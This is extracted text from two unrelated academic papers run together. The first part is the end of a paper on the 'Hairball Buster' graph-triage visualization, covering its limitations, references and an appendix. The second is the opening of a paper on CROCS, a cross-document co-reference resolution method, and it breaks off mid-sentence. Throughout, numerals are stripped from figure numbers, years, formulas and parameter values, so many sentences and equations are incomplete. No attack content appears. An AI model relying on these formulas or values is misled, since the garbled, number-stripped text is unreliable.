as shown in figures and . displaying a log–log or semi–log chart benefits from offsetting the origin by , or , depending on the size of the original data set, as described in the appendix. displaying multiple nodes with the same centrality measure using vertical offsets makes relationships easier to see. in this case, select the nodes of the same centrality that are of interest, as shown in figures and . calculate the size of the offset based on the number of curve nodes with the same y coordinate that need to fit within the space . above and . below the y-value. limitations of hb at the time of this writing, we have identified four limitations of the hb approach. first, if there are two or more nodes with the same degree (or other centrality measure), even though each node on the curve will have a different rank (x-coordinate), their neighbor nodes may land on top of each other. this reduces the ability of the hb display to allow an analyst to clearly see how the nodes and their neighbors relate to each other, as well as more difficult to identify which high- degree nodes are connected by two hops. to address this limitation, the hb algorithm and code allows for vertical offsets for nodes that share the same degree, as described in section ‘optional steps of the hb algorithm.’ note that for most social networks, the high-degree nodes tend not to share the same degree, and when they do, usually only a small number share the same degree. for the low- degree nodes, there is little interest in identifying whether one-degree nodes are sharing the same row. if there is a dot above it, then that one-degree node is connected to that higher-degree node. if there is no dot about it, then that node is connected to another one-degree node and not connected to the rest of the graph and is an outlier. the second limitation is that if the graph has multiple links per pair of nodes, as in a multirelational network (zweig, ), then those will not appear on the hb chart. to address this, one could translate the number of links into a link weight and color-code the weights as shown in figures and . however, if the multiple links each have their own weights, most approaches – including hb, the adjacency matrix, and blockmodeling – would be unable to represent the weights. third, hb is not designed to represent loops, or nodes that connect to themselves. while this is not usually an issue for social network graphs, it is a limitation for the basic hb algorithm. one could apply workarounds, such as a vertical offset if not otherwise being used in this hb case, or one could extend the hb display to a third dimension. fourth, while figure , for example, provides a clear indication of which nodes have the highest degree and whether they are highly connected to other (neighbor) nodes, it can be difficult to identify exactly which of the highest degree nodes are connected to each other due to the large number of nodes being displayed. to solve this display problem, we recommend taking the inverse and displaying the gaps when encountering situations with very large numbers of highly connected nodes, as well as displaying the top % of the highest-ranked nodes. (this requires no new calculations – just selecting the range of top nodes to zoom in on.) figure is an example of applying this solution, and clearly shows how few links are missing from the top nodes to be fully connected. when to use hb given the strengths and limitations of the hb approach, when should an analyst use or not use hb? the authors recommend that hb be used as the initial algorithm to apply to a data set because of its information density and computational efficiency. as a triage method, hb can provide in the first pass the number of highest degree nodes, how they relate to each other, and how they relate to their neighbors. for graphs with large number of nodes that cannot be visually separated in the full hb plot, zooming in on the top nodes provides a computationally inexpensive way to get the same information. the results of this triage can indicate areas of particular interest, such as gaps in the curve or neighbor nodes. moreover, if a graph reference library (see section ‘future features and applications of hb’) is available, the new, unknown data set can be quickly compared to its closest matches of known data sets, thereby suggesting likely underlying structures and algorithms to try next. hb may be less useful for very small graphs, when the structure of the graph is already well-understood, when an analyst already knows exactly what metrics to compute, or, as indicated by the limitations above (section ‘limitations of hb’), when the graph structure connections includes multiple links per node pair or links that loop back to the same node. future features and applications of hb the first planned future feature is to create a graph reference library (grl) to compare new, unknown graphs to a set of graphs whose underlying structure is known. for example, curves generated by exponential random graph models (ergms) will appear different from known social media data curves. once the known curves closest to the unknown curve have been identified, one can also display their neighbors and compare the neighbor distribution to the unknown graph neighbor distribution. this can provide a significant benefit to an analyst by quickly recommending known graphs to consider when analyzing a new graph to better understand its underlying structure. this comparison approach could also be automated or semi- automated by using convolutional neural networks to make these comparisons more thoroughly. note that such a broad range of comparisons is possible because the hb representation is canonical. creation of the grl and the ability to display multiple curves on the same chart for purposes of comparison will be addressed in a subsequent paper. one proposed visualization approach is to provide cross-highlighting or ‘brushing’ capabilities among different types of displays. for example, mousing over the hb display could not only provide additional information as tooltips, but by connecting to other display types such as backbone layout, also highlight the same nodes in other displays. this ability to cross- highlight selections in multiple displays would provide particular benefit in the examination of temporal displays, identifying which have changed positions in the curve and which have not. an alternative visualization approach for highlighting similarities and differences in temporal graphs is to highlight which nodes have not changed rank by more than one or two, and so on for a selected number of bands identifying such changes. this method of triage will also help analysts quickly focus on similarities and differences in temporal displays. summary of advantages of hb hairball buster (or node-neighbor centrality) is an approach that provides a computationally efficient approach to graph analytic triage. hb provides a unique, canonical representation of any node-link data set. the ability of hb to provide a standard representation allows different node-link data sets, or different time slices of the same data set, to be compared to identify anomalies or large structural changes. the computational efficiency of hb is on the order of m, where m is the number of links, plus n log n, where n is the number of nodes. because of its computational efficiency, hb can act as a triage method to identify key features of a data set, including whether the curve appears more representative of a social network or a random graph. it can also be used to quickly identify how many high- degree nodes are in the graph, which are the highest ranked nodes, whether those nodes are connected to each other directly or by two hops, and how connected the higher ranked nodes are to the lower-ranked nodes. in addition to degree, hb can visualize graphs using other centrality measures such as clique count, decay centrality, and betweenness. this flexibility of hb to represent a wide range of centrality measures is a significant benefit to analysts. this paper also presented differences between hb and force-directed and backbone layout visualization algorithms. in each case, hb provides greater information density than other algorithms at lower or equal calculation cost. overall, hb presents information about a graph in a single display that is not available in any other single display and can complement the analyst’s existing toolkit. acknowledgments no external funding was used to develop the hairball buster approach and code. the johns hopkins university applied physical laboratory (jhu/apl) funded a small internal research and development seedling project to develop the initial code in python (developed by co-author mark matties) and java (developed by co-author elisha peterson). the authors would also like to thank the following for providing data sets (cetin savkli for the jazz player data set, matt elder and janis butkevics for the toaster data, bobby seng for the codedna™ data, and mark matties for the iranian twitter™ data), marc johnson for complexity algorithm citations, and roger butler for recognizing that the hb approach was canonical. references bender-demoll, s. and mcfarland, d. a. . the art and science of dynamic network visualization. journal of social structure, . brandes, u. and corman, s. r. . visual unrolling of network evolution and the analysis of hairball buster: a graph triage method for viewing and comparing graphs dynamic discourse. information visualization, ( ): – , available at: https://doi.org/ . /palgrave. ivs. . freeman, l. c. . visualizing social networks. journal of social structure, ( ): , available at: https:// w w w.r e s e a r c h g a te.n e t /p r o fi l e / l i n to n _ fr e e m a n / publication/ _social_network_visualization_ methods_of/links/ bfc ae ac .pdf. fruchterman, t. m. j. and reingold, e. m. . graph drawing by force-directed placement. software: practice and experience, ( ): – , available at: https://doi.org/ . /spe. . ghoniem, m., fekete, j.-d. and castagliola, p. . on the readability of graphs using node-link and matrix- based representations: a controlled experiment and statistical analysis. information visualization, ( ): – , available at: https://doi.org/ . /palgrave.ivs. . girvan, m. and newman, m. e. j. . community structure in social and biological networks. proceedings of the national academy of sciences, ( ): – , available at: https://doi.org/ . /pnas. . gleiser, p. and danon, l. . adv. complex syst. , , available at: http://deim.urv.cat/~alexandre.arenas/ data/welcome.htm as cited on the konect website: http://konect.uni-koblenz.de/networks/arenas-jazz. gleiser, p. m. and danon, l. . community structure in jazz. advances in complex systems ( ): – , available at: https://www.worldscientific. com/doi/abs/ . /s . gopalan, p. k., gerrish, s., freedman, m., blei, d. m. and mimno, d. m. . scalable inference of overlapping communities. in pereira, f., burges, c. j. c., bottou, l. and weinberger, k. q. (eds), advances in neural information processing systems. mit press, cambridge ma, pp. – , available at: http:// papers.nips.cc/paper/ -scalable-inference-of- overlapping-communities.pdf. jackson, m. o. . social and economic networks, princeton university press, princeton and oxford. kamada, t. and kawai, s. . an algorithm for drawing general undirected graphs. information processing letters, ( ): – , available at: https://doi. org/ . / - ( ) - . lehmann, k. a. and kottler, s. . visualizing large and clustered networks. in kaufmann, m. and wagner, d. (eds), graph drawing. springer, berlin and heidelberg, pp. – . maughan, d. and carlsten, n. . transition to practice technology guide. department of homeland security washington dc, available at: https://www. dhs.gov/sites/default /files/publications/csd_t tp_ guide_ _webversion_ _ % final.pdf. moody, j., mcfarland, d. and bender-demoll, s. . dynamic network visualization. american journal of sociology, ( ): – , https://doi. org/ . / . nocaj, a., ortmann, m. and brandes, u. . untangling hairballs. in duncan, c. and symvonis, a. (eds), graph drawing. springer, berlin and heidelberg, pp. – . nocaj, a., ortmann, m. and brandes, u. . untangling the hairballs of multi-centered, small- world online social media networks. journal of graph algorithms and applications ( ): – , available at: https://doi.org/ . /jgaa. . peterson, e. . time spring layout for visualization of dynamic social networks. ieee network science workshop, pp. – , available at: https://doi.org/ . /nsw. . . sheny, z. and maz, k.-l. . path visualization for adjacency matrices. proceedings of the th joint eurographics/ieee vgtc conference on visualization, – , available at: https://doi.org/ . /vissym/ eurovis / - . squartini, t., mastrandrea, r. and garlaschelli, d. . unbiased sampling of network ensembles. new journal of physics, ( ): , available at: https:// doi.org/ . / - / / / . twitter™ . twitter™ website, data set regarding election integrity, periscope, scope and the periscope logo are trademarks of twitter, inc. or its affiliates, available at: https://about.twitter.com/ en_us/values/elections-integrity.html#data (accessed november , ). ware, c. . visual thinking: for design. elsevier, amsterdam. wasserman, s. and faust, k. . social network analysis by stanley wasserman, cambridge university press, available at: https://doi.org/ . / cbo (accessed october , ). white, h. c., boorman, s. a. and breiger, r. l. . social structure from multiple networks. i. blockmodels of roles and positions. american journal of sociology, ( ): – , available at: https://doi. org/ . / . zweig, k. a. . network analysis literacy: a practical approach to the analysis of networks. springer science & business media, wein, p. . connections appendix. semi–log and log–log displays for the hairball buster approach for very large data sets, a cartesian representa- tion of the hb algorithm may not be sufficient to encompass the whole data set. although the hb approach has been successfully applied to data sets with over , nodes displayed on carte- sian coordinates, there exist much larger data sets for which a semi–log or log–log display would be needed to represent all of the data in a single hb chart. (in this appendix, we will always be referring to log-base- .) when simply taking the semi–log or log–log of a data set, we immediately discovered that the display is dominated by the first few nodes, leaving little visual benefit in the remaining part of the chart. see figure a for an example of a log–log display based on the jazz player data set. this does not present particularly useful information to the analyst. however, there is an easy solution to this problem. by adding either or to all of the data points, we are essentially creating an ‘offset’ of the origin to point , or point , . figure a shows an offset of the origin to the point at coordinates , for the jazz player data set. although a relatively small data set, figure a : sample log –log plot of jazz player data set with no offset. figure a : sample offset of origin to , for log –log plot of jazz player data set. hairball buster: a graph triage method for viewing and comparing graphs figure a : sample offset of origin to , for semi–log plot of toaster data set. this example shows how the offset of the origin allows a much smoother and continuous representation of the curve compared to figure a . (one needs to remember that when reading the chart, the origin has been offset.) figure a shows the toaster data set in semi–log format. no offset was needed because the log of one is . since most of the connections are of degree , the origin of zero–zero works. however, the display tool the authors applied would not display anything at coordinate value of for the y-axis. therefore, we placed the degree one nodes at the lowest y-value on the semi–log display. cross-document co-reference resolution using sample-based clustering with knowledge enrichment sourav dutta max planck institute for informatics saarbrücken, germany sdutta@mpi-inf.mpg.de gerhard weikum max planck institute for informatics saarbrücken, germany weikum@mpi-inf.mpg.de abstract identifying and linking named entities across information sources is the basis of knowledge acquisition and at the heart of web search, rec- ommendations, and analytics. an important problem in this context is cross-document co- reference resolution (ccr): computing equiv- alence classes of textual mentions denoting the same entity, within and across documents. prior methods employ ranking, clustering, or probabilistic graphical models using syntactic features and distant features from knowledge bases. however, these methods exhibit limita- tions regarding run-time and robustness. this paper presents the crocs framework for unsupervised ccr, improving the state of the art in two ways. first, we extend the way knowledge bases are harnessed, by con- structing a notion of semantic summaries for intra-document co-reference chains using co- occurring entity mentions belonging to differ- ent chains. second, we reduce the computa- tional cost by a new algorithm that embeds sample-based bisection, using spectral clus- tering or graph partitioning, in a hierarchi- cal clustering process. this allows scaling up ccr to large corpora. experiments with three datasets show significant gains in output qual- ity, compared to the best prior methods, and the run-time efficiency of crocs. introduction . motivation and problem statement we are witnessing another revolution in web search, user recommendations, and data analytics: tran- sitioning from documents and keywords to data, knowledge, and entities. examples of this mega- trend are the google knowledge graph and its ap- plications, and the ibm watson technology for deep question answering. to a large extent, these ad- vances have been enabled by the construction of huge knowledge bases (kb’s) such as dbpedia, yago, or freebase; the latter forming the core of the knowledge graph. such semantic resources provide huge collections of entities: people, places, compa- nies, celebrities, movies, etc., along with rich knowl- edge about their properties and relationships. perhaps the most important value-adding com- ponent in this setting is the recognition and dis- ambiguation of named entities in web and user contents. named entity disambiguation (ned) (see, e.g., (cucerzan, ; milne & witten, ; cornolti et al., )) maps a mention string (e.g., a person name like “bolt” or a noun phrase like “light- ning bolt”) onto its proper entity if present in a kb (e.g., the sprinter usain bolt). a related but different task of co-reference reso- lution (cr) (see, e.g., (haghighi & klein, ; ng, ; lee et al., )) identifies all mentions in a given text that refer to the same entity, including anaphoras such as “the president’s wife”, “the first lady”, or “she”. this task when extended to process an entire corpus is then known as cross-document co-reference resolution (ccr) (singh et al., ). it takes as input a set of documents with entity men- tions, and computes as output a set of equivalence classes over the entity mentions. this does not in- volve mapping mentions to the entities of a kb. un- like ned, ccr can deal with long-tail or emerging entities that are not captured in the kb or are merely in very sparse form. state of the art and its limitations. cr methods, for co-references within a document, are generally based on rules or supervised learning using differ- transactions of the association for computational linguistics, vol. , pp. – , . action editor: hwee tou ng. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. ent kinds of linguistic features like syntactic paths between mentions, the distances between them, and their semantic compatibility as derived from co- occurrences in news and web corpora (haghighi & klein, ; lee et al., ). some methods ad- ditionally use distant labels from knowledge bases (kb’s). cluster-ranking and multi-sieve methods in- crementally expand groups of mentions and exploit relatedness features derived from semantic types, alias names, and wikipedia categories (rahman & ng, a; ratinov & roth, ). the ccr task - computing equivalence classes across documents - is essentially a clustering prob- lem using a similarity metric between mentions with features like those discussed above. however, standard clustering (e.g., k-means or em variants, cluto, etc.) lacks awareness of the transitivity of co-reference equivalence classes and suffers from knowledge requirement of model dimensions. prob- abilistic graphical models like markov logic net- works (richardson & domingos, ; domingos et al., ; domingos & lowd, ) or factor graphs (loeliger, ; koller & friedman, ) take into consideration constraints such as transi- tivity, while spectral clustering methods (luxburg, ) implicitly consider transitivity in the underly- ing eigenspace decomposition, but suffer from high computational complexity. in particular, all methods need to precompute features for the data points and similarity values between all pairs of data points. the latter may be alleviated by pruning heuristics, but only at the risk of degrading output quality. note that ccr cannot be addressed by simply applying local cr to a “super-document” that con- catenates all documents in the corpus. within a document, identical mentions typically refer to the same entity, while in different documents, identical mentions can have different meanings. although a cross-document view gives the opportunity to spot joint cues from different contexts for an entity, doc- uments vary in their styles of referring to entities and merely combining the local co-reference chains into a super-group might lead to substantial noise intro- duction. in addition, cr methods are not designed for scaling to huge “super-documents” correspond- ing to millions of web pages or news articles. problem statement. we aim to overcome the above limitations by proposing a ccr method that makes rich use of distant kb features, considers transitiv- ity, and is computationally efficient. . approach and contribution in this paper, we efficiently tackle the ccr problem by considering co-occurring mentions and rich features from external knowledge bases, and using a transitivity-aware sampling-based hierarchical clustering approach. we developed the crocs (cross-document co-reference resolution) frame- work with unsupervised hierarchical clustering by repeated bisection using spectral clustering or graph partitioning. crocs harnesses semantic features derived from kb’s by constructing a notion of semantic summaries (semsum’s) for the intra-document co-reference chains. in addition to incorporating kb labels as features for the co- referring mentions, we also consider co-occurring mentions belonging to other entities and utilize their features. consider the text: hillary lived in the white house and backed bill despite his affairs. containing men- tion groups: {“hillary”}, {“bill”}, and {“white house”}. merely obtaining distant kb features for the first mention group, the sparse information leads to high ambiguity, e.g., may refer to the mountaineer sir edmund hillary. but by also obtaining features from kb for “white house” (co-occurring mention), we obtain much stronger cues towards the correct solution. crocs adopts a bisection based clustering method and invokes it repeatedly in a top-down hi- erarchical procedure with an information-theoretic stopping criterion for cluster splitting. we escape the quadratic run-time complexity for pair-wise sim- ilarity computations by using a sampling technique for the spectral eigenspace decomposition or for graph partitioning. this is inspired by the recent work of (krishnamurty et al., ; wauthier et al., ) on active clustering techniques. similar- ity computations between mention groups are per- formed lazily on-demand for the dynamically se- lected samples. in a nutshell, the novel contributions are: • crocs, a framework for cross-document co- reference resolution using sample-based spectral clustering or graph partitioning embedded in a hierarchical bisection process; • semsum’s, a method for incorporating distant features from kb’s also considering the cou- pling between co-occurring mentions in differ- ent co-reference chains; • experimental evaluation with benchmark cor- pora demonstrating substantial gains over prior methods in accuracy and run-time. computational framework the crocs model assumes an input set of text documents d = {d ,d , . . .}, with markup of entity mentions m = {m ,m , . . . ,m ,m , . . .}, mij ∈ dj, present in the documents. crocs computes an equivalence relation over m with equivalence classes cj, where cj ∩ ck = ∅ for j = k and ∪jcj = m. the number of desired classes is apriori unknown; it needs to be determined by the algorithm. detecting the mentions and marking their boundaries within the text is a problem by itself, referred to as ner (named entity recognition). this paper does not address this issue and relies on established methods. the crocs framework consists of stages: . intra-document cr: given an input corpus, d with mentions m, we initially perform intra- document co-reference resolution. . knowledge enrichment: for each of the local mention groups ({mij}) obtained in the previ- ous step, we combine the sentences of the men- tions to determine the best matching entity in a kb and retrieve its features. analogous steps are performed for co-occurring mentions (of {mij}) and their features included. we term this feature set of {mij} as semantic summary (semsum’s). . similarity computation: we compute similar- ity scores between mention groups based on the features extracted above. these are computed on-demand, and only for a sampled subset of mentions (avoiding quadratic computation cost). . sampling-based clustering: we perform spec- tral clustering or balanced graph partitioning (using the similarity metric) in a hierarchi- cal fashion to compute the cross-document co- reference equivalence classes of mentions. intra-document cr crocs initially pre-processes input documents to cast them into plain text (using standard tools like (https://code.google.com/p/ boilerpipe/), (www.jsoup.org), etc.). it then uses the stanford corenlp tool suite to detect mentions and anaphors (http://nlp. stanford.edu/software/). the detected mentions are also tagged with coarse-grained lexi- cal types (person, organization, location, etc.) by the stanford ner tagger (finkel et al., ). this forms the input to the intra-document cr step, where we use the state-of-the-art open-source cr tool (based on multi-pass sieve algorithm) from stanford to compute the local mention co-reference chains (raghunathan et al., ; lee et al., ; lee et al., ). the tagged texts and the local co- reference chains are then passed to the second stage. this local cr step may produce errors (e.g., in- correct chaining of mentions or omissions) which propagate to the later stages. however, improving intra-document cr is orthogonal to our problem and thus out of the scope of this paper. our experiments later show that crocs is robust and produces high- quality output even with moderate errors encoun- tered during the local-cr stage. knowledge enrichment the knowledge enrichment phase starts with the local co-reference chains per document. assume that we have obtained mention groups (chains) {michelle, she, first lady} and {the president’s wife, first lady} from two documents. to assess whether these two chains should be combined, i.e., they both refer to the same entity, we compute seman- tic features by tapping into knowledge bases (kb’s). specifically, we harness labels and properties from freebase.com entries, for possibly matching enti- ties, to enrich the features of a mention group. the kb features form a part of the semantic summary or semsum’s for each local mention group. features de- rived from the constructed semsum’s are later used to compare different mention groups via a similarity measure (described in section ). formally, a mention m is a text string at a partic- ular position in a document. m belongs to a mention group m(m) consisting of all equivalent mentions, with the same string (at different positions) or differ- ent strings. for a given m, the basic semsum of m, sbasic(m), is defined as sbasic(m) = {t ∈ sentence(m′)|m′ ∈ m(m)} ∪ {t ∈ label(m′)|m′ ∈ m(m)} where t are text tokens (words or phrases), sentence(m′) is the sentence in which mention m′ occurs, and label(m′) is the semantic label for m′ obtained from the kb. note that sbasic(m) is a bag of tokens, as different mentions in m(m) can obtain the same tokens or labels and there could be multi- ple occurrences of the same mention string in m(m) anyway. prior works on cr (e.g., (rahman & ng, a; ratinov & roth, ; hajishirzi et al., ; zheng et al., )) and ned (e.g., (cucerzan, ; milne & witten, ; ratinov et al., ; hoffart et al., ; hajishirzi et al., )) have considered such form of distant features. crocs extends these pre- vious methods by also considering distant features for co-occurring mention groups, and not just the group at hand. we now introduce a general frame- work for knowledge enrichment in our ccr setting. strategies for knowledge enrichment involve de- cision making along the following dimensions: • target: items (single mentions, local mention groups, or global mention groups across docu- ments) for which semantic features are obtained. • source: the resource from where semantic fea- tures are extracted. existing methods consider a variety of choices: i) input corpora, ii) external text corpus, e.g., wikipedia, and iii) knowledge bases such as freebase, dbpedia, or yago. • scope: the neighborhood of the target consid- ered for enrichment. it can either be restricted to the target itself or can consider co-occurring items (other mention groups connected to the target). • match: involves mapping the target to one or more relevant items in the source, and can in- volve simple name queries to full-fledged ned based on relevance or score confidence. existing methods generally consider individual mentions or local mention groups as target. ex- tended scopes like co-occurring entities based on automatic ner and ie techniques have been pro- posed (mann & yarowsky, ; niu et al., ; chen & martin, ; baron & freedman, ), but use only the input corpus as the enrichment source. recent methods (rahman & ng, a; ratinov & roth, ; hajishirzi et al., ; zheng et al., ) harness kb’s, but consider only lo- cal mention groups. also, these methods rely on high-quality ned for mapping mentions to kb en- tries. in contrast, crocs considers extended scopes that include mention groups along with co- occurring mention groups when tapping into kb’s. we make only weak assumptions on matching men- tions against kb entities, by filtering on confidence and merely treating semsum’s as features rather than relying on perfectly mapped entities. specifically, our crocs method handles the four dimensions of knowledge enrichment as follows: enrichment target: we use per-document mention groups, after the local cr step, as target. in princi- ple, we could repeat the enrichment during the itera- tions of the ccr algorithm. however, as crocs performs top-down splitting of groups rather than bottom-up merging, there is no added value. enrichment source: we include all the sentences of a mention group in its semsum’s, thus drawing on the input document itself. the main enrichment har- nesses entity-structured kb’s like freebase or yago by querying them with phrases derived from the mention groups’ summaries. the features that are extracted from the best-matching entity include se- mantic types or categories (e.g., “politician”, “award nominee”), alias names (e.g., “michelle robinson”), titles (e.g., “first lady of the united states”) and gender of people. these features are appended to the semsum’s and form the core of a mention group’s semantic summary. enrichment scope: crocs includes co- occurring mention groups as additional targets for semantic features. consider the example sentences in figure . suppose the local cr finds mention groups as shown. the mentions and the sentences in which they occur are represented as a bipartite graph depicting their connections (right side of fig. ). consider the mention group of “president’s wife” (m ) and “first lady” (m ). together with their immediate sentence neighbors in the bipartite graph, these mentions form what we call the basic scope for knowledge enrichment, i.e., {m ,s ,m ,s }. the sentences of this mention group contain other mentions which can be in mention groups spanning further sentences. we utilize this co- occurrence as additional cues for characterizing the mention group at hand. the union of the current scope with that of all the two-hop neighbors in the bipartite graph form the extended scope. for the group {m ,s ,m ,s }, the two-hop men- tion neighbors are {m ,m ,m ,m }. hence, we include the scopes of these groups, the men- tions and sentences, yielding the extended scope {m ,s ,m ,s ,m ,m ,m ,s }. formally, for mention m in mention group m(m), its extended semsum sextended(m) is: sextended(m) = sbasic(m) ∪( ⋃ m′ ( sbasic(m ′) | ∃s : m′ ∈ s∧m ∈ s ) ) where s is a sentence in which both m and m′ occur. in principle, we could consider even more aggres- sive expansions, like -hop neighbors or transitive closures. however, our experiments show that the -hop extension is a sweet spot that gains substan- tial benefits over the basic scope. enrichment matching: for each local mention group, crocs first inspects the coarse-grained types (person, organization, location) as determined by the stanford ner tagger. we consider pronouns to derive additional cues for person mentions. if all tags in a group agree, we mark the group by this tag; otherwise the group as a whole is not type-tagged. to match a mention group against a kb entity, we trigger a phrase query comprising tagged phrases from the mention group to the kb interface . we remove non-informative words from the phrases, dropping articles, stop-words, etc. for example, the first mention group, {m ,m } in fig. leads to the query "president wife first lady". the query results are filtered by matching the result type- tag with the type tag of the mention group. for the extended scope, we construct analogous queries for the co-occurring mentions: "white house us president residence" and "husband" in the example. the results are processed as follows. we primarily rely on the kb service itself to rank the matching entities by confidence and/or rele- vance/importance. we simply accept the top-ranked entity and its kb properties, and extend the sem- sum’s on this basis. this is also done for the co- occurring mention groups, leading to the extended scope of the original mention group considered. to avoid dependency on the ranking of the kb, we can alternatively obtain the top-k results for each query and also the kb’s confidence for the entity matching. we then re-rank the candidates by our similarity measures and prune out candidates with low confidence. we introduce a confidence thresh- old, θ, such that all candidates having matching con- fidence below the threshold are ignored, i.e., the for example, (https://gate.d .mpi-inf.mpg.de/ webyagospotlx/webinterface) or (www.freebase.com/ query) m s s s s m m m m m m m m m m s s s s m m m m m m m m m m m the president‘s wife lives in the white house. the first lady helps her husband with the duties in the president‘s residence. the white house is located in washington dc and is the home of the us president. the american president and his wife live in washington. figure : example of local mention groups. algorithm : extendedknowledgeenrichment require: text t , set g of mention groups (from stanford corenlp), kb match threshold θ, knowledge base kb ensure: semsum for each group in g : for each mention group, m ∈ g do : basic scope: semsumm ← sentences from t containing mentions in m : extract and add kb features for mentions and phrases in semsumm (sbasic(m)) : extended scope: append context of -hop co-occurring mentions (from bipartite graph) to semsumm : matching: extract phrases from semsumm for query generation to kb : retrieve highest ranked kb result entity e : if match confidence of e > θ then : extract set of features for e, le from kb : append le to semsumm (sextended(m)) : end if : end for : output semsumm for all m ∈ g entire mention group is disregarded in the semsum construction. this makes extended scope robust to noise. for example, the mention group {husband} having low confidence would likely degrade the semsum’s quality and is thus dropped. feature vector: the semsum’s of the mention groups comprise sentences and bags of phrases. for the example mention group {m ,m }, we include the sentences {s ,s ,s } during the extended-scope enrichment, and obtain phrases from the kb like: “michelle obama”, “first lady of united states”, “capital of the united states”, etc. algorithm shows the pseudo-code for constructing semsum’s. crocs next casts each semsum into two forms, (i) a bag of words, and (ii) a bag of keyphrases, and uses both for constructing a feature vector. similarity computation crocs compares mention groups by a similarity measure to infer whether they denote the same entity or not. the similarity is based on the feature vec- tors of mention groups (constructed as in section ). each feature in a mention group’s vector is weighted using ir-style measures according to the bag-of- words (bow ) model or the keyphrases (kp ) model for the semsum’s. empirically, the best approach is a mixture of both the words and keyphrases model, which is employed by crocs. similarity compar- isons are computed on-demand and only for a small sampled set of mention groups, as required during the hierarchical clustering procedure (see section ). the similarity of two mentions groups g ,g is, sim(g ,g ) = α×simbow (g ,g ) + ( −α) ×simkp (g ,g ) where α is a tunable hyper-parameter. whenever two mention groups are to be combined (referring to the same entity), their feature vectors are combined by computing a bag union of their words and/or phrases, and then recomputing the weights. with- out loss of generality, our default setting is α = . . bag-of-words model (bow): for this model, we compute the term frequency, tf(w) for each word w in the semsum’s, and also the inverse document frequency, idf(w), of the word across all semsum’s (i.e., all mention groups from all input documents). the weight of w , wgt(w) = tf(w) × idf(w). as the semsum’s are short, we use the simple product rather than dampening tf values or other variations. alternatively, more advanced ir weighting models such as okapi bm or statistical language models can be used. however, the classical tf×idf measure works quite well. crocs computes the similarity of two feature vectors by their cosine distance. keyphrases model (kp): the keyphrases of a men- tion group are obtained by extracting proper names, titles, alias names, locations, organization, etc., from its semsum’s. similar to the bow model, crocs supports tf×idf style weights for entire keyphrases. for computing the similarity of keyphrases be- tween two mention groups g and g , crocs matches the keyphrases of g in the semsum’s of g , and vice versa. however, entire phrases rarely match exactly. for example, the keyphrase “peace nobel” match only partially in the text “nobel prize for peace”. to consider such partial matches and reward both high overlap of words and short dis- tances between matching words (locality), we adopt the scoring model of (taneva et al., ). the score for a partial match of keyphrase p in text x is, s(p|x) = # match words len. of cov(p|x) (∑ w∈cov(p) wgt(w)∑ w∈p wgt(w) ) +γ where the cover (cov) of p in x is the shortest word span (in x) containing all the words of p present in x (with a bound of - words). for the example above, the cover of p = “peace nobel” in the text x is “nobel prize for peace” (all words matching with cover length ). the parameter γ, ( < γ < ) serves to tune the progression of penalizing missing words. in our experiments, γ was set to . and stop- words such as “a”, “the”, etc. were removed with only keywords being considered. for mention groups g and g , we compute, sim(g |g ) = ∑ p∈kp(g ) wgt(p) ×s(p|semsum′s(g )) finally, we resolve the asymmetry in similarity mea- sure due to the ordering of the two groups by setting, sim(g ,g ) = max{sim(g |g ),sim(g |g )} clustering algorithm the final stage of crocs takes the mention groups and the semsum’s as input. it performs a top- down hierarchical bisection process, based on sim- ilarity scores among entities, to cluster together co- referring mention groups at each splitting level. initially all mention groups are placed in a single cluster, and are then recursively split until a stopping criterion finalizes a cluster as leaf. at each level, cluster splitting is performed by using either spectral clustering (luxburg, ) or balanced graph parti- tioning (karypis & kumar, ). both these meth- ods implicitly consider transitivity, which is essen- tial as the equivalence classes of mentions should be transitively closed. the challenge of this seemingly simple procedure lies in (i) judiciously choosing and optimizing the details (model selection and stopping criterion), and (ii) reducing the computational cost. the latter is crucial as spectral clustering has cubic complexity, graph partitioning heuristics computa- tions are expensive, and ccr (unlike cr) needs to cope with web-scale inputs consisting of millions of documents and entities. clustering is invoked for each of the coarse- grained entity types separately (as obtained from stanford ner tagger): people, places, and organiza- tions. the benefit is twofold: gaining efficiency and improving accuracy, as two different entity types would not co-refer in reality. however, the risk is that two differently tagged mention groups might actually refer to the same entity, with at least one tag being incorrect. our experiments show that the benefits clearly outweigh this risk. without loss of generality, we only consider chains that are tagged into one of the above types, and other co-reference chains are ignored. although this might lead to cer- tain mentions being overlooked, improving the ac- curacy and recall of ner tagging approaches are or- thogonal to our current scope of work. active spectral clustering: spectral cluster- ing (luxburg, ) uses the eigenspace of the sim- ilarity graph’s laplacian matrix to compute graph partitions as clusters. crocs adopts the recently proposed active spectral clustering technique (kr- ishnamurty et al., ; wauthier et al., ), which approximates the eigenspace of a laplacian with a small subset of sampled data points (mention groups in crocs). for n data points and sample size s in the order of o(log n), this technique re- duces the cost of spectral clustering from o(n ) to o(log n) (with bounded error). crocs initializes each bisection step by selecting s mention groups from a cluster and computes all pair-wise similari- ties among the sampled groups. spectral clustering is then performed on this subset to obtain a split into clusters. the non-sampled mention groups are as- signed to the closest cluster in terms of average dis- tance to cluster centroids. the children clusters are iteratively split further at next levels until the stop- ping criterion fires. balanced graph partitioning: balanced graph partitioning assigns the vertices of a graph into com- ponents of nearly the same size having few edges across components. the problem is np-complete, and several approximation algorithms have been proposed (buluc et al., ). crocs uses the metis software (http://glaros.dtc.umn. edu/gkhome/metis/metis/overview) to obtain mention group partitioning at each level of the hierarchical clustering. the underlying mention similarity graph is con- structed by sampling s mention groups, and sim- ilarities among them represented as edge weights. for mention groups not selected in the sample, sim- ilarities to only the s sample points are computed and corresponding edges created. the graph is then partitioned using metis (karypis & kumar, ) (multi-level recursive procedure) to minimize the edge-cuts thereby partitioning dissimilar men- tion groups. specifics of crocs: active spectral clustering (krishnamurty et al., ) uses random sampling, chooses the number of final clusters, k based on eigengap, and enforces a balancing constraint for the k clusters to be of similar sizes. crocs judi- ciously deviates from the design of (krishnamurty et al., ) as: • model selection: we choose a fixed number of partitions k at each cluster-splitting step of the hierarchical process. we use a small k value, typically k = . this avoids selecting model di- mension parameters, allowing the stopping cri- terion to decide the final number of clusters. • form of graph cut: crocs uses balanced nor- malized cut for graph partitioning (karypis & kumar, ). however, unbalanced cluster sizes with several singleton clusters (having only one mention group) might be formed. in our ccr setting, this is actually a natural outcome as many long-tail entities occur only once in the corpus. such mention groups significantly differ in semantic and contextual features compared to the other mention groups. hence, singleton clus- ter mentions have low similarity score (based on semsum’s) with other mentions groups. this translates to low edge weights in the underlying similarity graph structure (between mentions), thus forming favorable candidates in the initial phases of cluster splitting using minimum edge- cut based graph partitioning. therefore, crocs inherently incorporates early partition (during the clustering 